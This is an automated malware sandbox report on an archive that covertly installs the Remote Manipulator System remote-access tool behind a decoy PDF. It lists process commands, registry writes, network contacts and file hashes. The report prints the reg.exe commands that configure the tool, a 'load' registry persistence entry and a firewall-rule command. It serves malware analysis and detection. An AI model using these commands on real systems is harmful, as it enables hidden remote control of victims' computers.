5555267344e557a773562514945486c4e635241384d6653593253326459586c526644773d3d0d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223630303034223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a0a4164646974696f6e616c0604353535351144697361626c65496e7465726e65744964080b536166654d6f6465536574080000

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e003c0069006e007400650072006e00650074005f00690064003e003500310035002d003100330037002d003900320034003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e0074007200750065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a00

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "Password" /t REG_BINARY /d 38003900440043004100460043003500460042003900450044004200380041003800370030003400350033003600390033003300350037003700340030003800440031003700410036003500390036003400390033003800460033004100340035003400380036003200370030003100310037004600420036003300390041003700350043004300310039004400360046003400380030003000460030003700320037003900370036004200370030004300420041003800340037003700390034003900300034003600450033003400360034003600350030004300430045004100410045003800390046004100430030003500390037004600390032003400

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "CallbackSettings" /t REG_BINARY /d fffe

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003600310030003000330022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e0067006c00690067006f00720069006a006d00610073006b006f00760040006d00610069006c002e00720075003c002f0065006d00610069006c003e003c00690064003e007b00330039003600430045003300460032002d0035003000460037002d0034003300340033002d0038003300450036002d004100420036003600430035003400440046003400320041007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00360031003000300033003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a00

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe"

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v load /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe" /f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

hide.exe /fwl Internet C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe -second

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe -second

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe /tray /user

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe /tray /user

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\MIP1023.pdf"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B211C197798B0AC0E6EAFD57286624E5 --mojo-platform-channel-handle=1680 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=82DB75B38B652101CA9E60EF04AA88E8 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=82DB75B38B652101CA9E60EF04AA88E8 --renderer-client-id=2 --mojo-platform-channel-handle=1704 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E2ACCBD01E4F31BABE8879BCEC0D590E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E2ACCBD01E4F31BABE8879BCEC0D590E --renderer-client-id=4 --mojo-platform-channel-handle=2240 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=6A8F3B93ECB4008E5A24A38740E91A5C --mojo-platform-channel-handle=2516 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A67D202DC01F7D70231FC22D095F377B --mojo-platform-channel-handle=1816 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5C5E6CC1E4FA9CD3287AFF2917B356C7 --mojo-platform-channel-handle=2532 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

Network

Country Destination Domain Proto
US 52.109.8.19:443 tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
US 8.8.8.8:53 rmansys.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
RU 31.31.198.18:80 rmansys.ru tcp
RU 31.31.198.18:80 rmansys.ru tcp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\uac.cmd

MD5 36d09166ae9f88caa1b2d80a392ed1c8
SHA1 b248e43bab127d8e1e466821b96b7b7ecf37cb78
SHA256 3552631b96bf28d3e4641cc83684e5bd2cc00cc9aca31d456c688d16df674135
SHA512 d45e916cd913c6c1fbd59cd94c8ab55c158c9c616decaffccf0334ae4dd82b30301809c334322858c9b8b44d5d72bfe2ee2ee5b11a65a5ea9d945581e67a089b

C:\Users\Admin\AppData\Local\Temp\RarSFX0\data.dat

MD5 f1d16ce97d2fb39ad52e84bdc8d51d46
SHA1 c268cab6d8ec267eee463672809faaee99c2f446
SHA256 85417332dae0e7cf7ee44773d19e344c27bbf000d9165ca1e0c7a6d0f9e57a0f
SHA512 cff4f2475ed74e9102a2cfd88d019119f90d47086dcef3a2c053c0a7b0279076caf7782aeb314b857c304b52cd482badb4e6e1a611191a807317e92e60fe16e5

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.dat

MD5 eb513889e806ce193274ea8858e89ab5
SHA1 3c1ff7bbe8bc2be9e5531ffad25b18f03c51cf6b
SHA256 f5609e3bcc1695839ae0d3a3ff08d5c73d0bab4afa3a2b5fced6c9b14f2aa993
SHA512 cb3d254c7ee4c918a320629e461b99acf90ef92d0276d2663f1b93ea17aa8612226c39c7c234283955fe9e071f7fa324f2586e7eba8ebc3fb5674f58af005e26

C:\Users\Admin\AppData\Local\Temp\RarSFX0\MIP1023.pdf

MD5 83f604f3087b84afc6846673054e861f
SHA1 88c3fda42768c5b465fd680591639f2cdc933283
SHA256 11e0a49bfe8173983e6ddf13052da345b3322f8d6d8cd2e89dd602d89941516e
SHA512 73ff11caf9b5415157c409d3bcef0b534146538c632f4850ab813cfdbb15ef5f057ad2a1bda591e9ec27ad16d7e8aa10e4b58bc603db53c859819f1a08c01f98

C:\Users\Admin\AppData\Local\Temp\RarSFX0\rfusclient.dat

MD5 a24ce4468618751732a5f3cd01e66a8b
SHA1 4d46fb773c02a9ff98e998da4f0777fb5d9f796b
SHA256 acf797494691e34077f9e6cda9a39f91a3efa0a840b71859ffde36bf3e228f2e
SHA512 4eb928491764b2960474e71229d8a3f219029f91ff3725218d58de83ae414c3f7b3bc421915b008aaf1393706a0c836615906bd6a6291af6370bb9f98ab58a3a

C:\Users\Admin\AppData\Local\Temp\RarSFX0\rutserv.dat

MD5 27a98c9a7fa7120147ae523efa9fadbf
SHA1 6a5ca3b9ee0a048f0aee1e99cbf3943d84f597ff
SHA256 53071088adb86f5d7a8c82573da94849edbd5f102bc94c9775247a54e26eaf57
SHA512 8f09b0211e6c4c6d5ddf9a797e59501bb0db4cb2d8d730f4c412a4b83adf68ad617516f330e1b0bcfecb07c514be56440e5b2ac3c55537495ce19ae64fcbf03c

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\hide.dat

MD5 eb513889e806ce193274ea8858e89ab5
SHA1 3c1ff7bbe8bc2be9e5531ffad25b18f03c51cf6b
SHA256 f5609e3bcc1695839ae0d3a3ff08d5c73d0bab4afa3a2b5fced6c9b14f2aa993
SHA512 cb3d254c7ee4c918a320629e461b99acf90ef92d0276d2663f1b93ea17aa8612226c39c7c234283955fe9e071f7fa324f2586e7eba8ebc3fb5674f58af005e26

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

memory/1796-267-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1796-269-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1796-270-0x0000000000400000-0x00000000004D3000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.dat

MD5 27a98c9a7fa7120147ae523efa9fadbf
SHA1 6a5ca3b9ee0a048f0aee1e99cbf3943d84f597ff
SHA256 53071088adb86f5d7a8c82573da94849edbd5f102bc94c9775247a54e26eaf57
SHA512 8f09b0211e6c4c6d5ddf9a797e59501bb0db4cb2d8d730f4c412a4b83adf68ad617516f330e1b0bcfecb07c514be56440e5b2ac3c55537495ce19ae64fcbf03c

memory/3120-273-0x0000000000400000-0x0000000000AF8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

memory/3120-275-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/3120-276-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/3120-277-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/3120-278-0x0000000000BE0000-0x0000000000D2A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

memory/652-283-0x0000000000C50000-0x0000000000C51000-memory.dmp

memory/652-284-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/652-285-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/652-287-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/652-289-0x0000000000400000-0x0000000000AF8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.dat

MD5 a24ce4468618751732a5f3cd01e66a8b
SHA1 4d46fb773c02a9ff98e998da4f0777fb5d9f796b
SHA256 acf797494691e34077f9e6cda9a39f91a3efa0a840b71859ffde36bf3e228f2e
SHA512 4eb928491764b2960474e71229d8a3f219029f91ff3725218d58de83ae414c3f7b3bc421915b008aaf1393706a0c836615906bd6a6291af6370bb9f98ab58a3a

memory/4004-292-0x0000000000400000-0x0000000000A98000-memory.dmp

